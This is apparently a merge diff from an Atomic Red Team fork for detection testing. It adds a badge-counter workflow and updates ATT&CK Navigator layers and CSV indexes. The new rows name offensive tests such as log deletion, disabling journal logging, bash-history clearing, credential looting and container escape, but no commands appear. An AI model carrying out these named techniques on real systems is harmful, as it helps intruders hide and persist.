Merge branch 'T1562.004' of github.com:iai-rsa/atomic-red-team into T1562.004

.github/workflows/generate-counter.yml

@@ -0,0 +1,37 @@
+name: generate-svg-counter
+
+on:
+  push:
+    branches:
+      - master
+
+jobs:
+  generate-counter:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - uses: actions/setup-python@v4
+        with:
+          python-version: '3.11.2' 
+          cache: 'poetry'
+      - name: Generate shields.io URL
+        run: python generate_shield.py atomics/
+        id: shield
+      - name: Generate shields.io URL
+        run: python generate_counter.py -d atomics/
+        id: counter
+      - name: Update README
+        run: |
+          sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
+        shell: bash
+      - name: update github with new site
+        run: |
+          # configure git to prep for commit
+          git config user.email "opensource@redcanary.com"
+          git config user.name "publish bot"
+          git config --global push.default simple
+          git add README.md
+          git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
+          # push quietly to prevent showing the token in log
+          # no need to provide any credentials
+          git push

README.md

@@ -16,7 +16,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1274-flat.svg)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -14,3 +14,4 @@ privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
+defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh

atomics/Indexes/Indexes-CSV/index.csv

@@ -71,8 +71,20 @@ defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
-defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
-defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,4,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,5,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,6,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,7,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,8,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,9,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,10,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,11,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,12,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
@@ -123,6 +135,8 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
+defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
+defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
@@ -228,8 +242,10 @@ defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User
 defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
 defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
 defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
+defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
+defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
 defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -269,6 +285,7 @@ defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
+defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -288,6 +305,11 @@ defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User usin
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -453,8 +475,11 @@ defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer S
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -509,6 +534,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
@@ -605,6 +631,7 @@ privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
@@ -643,8 +670,11 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
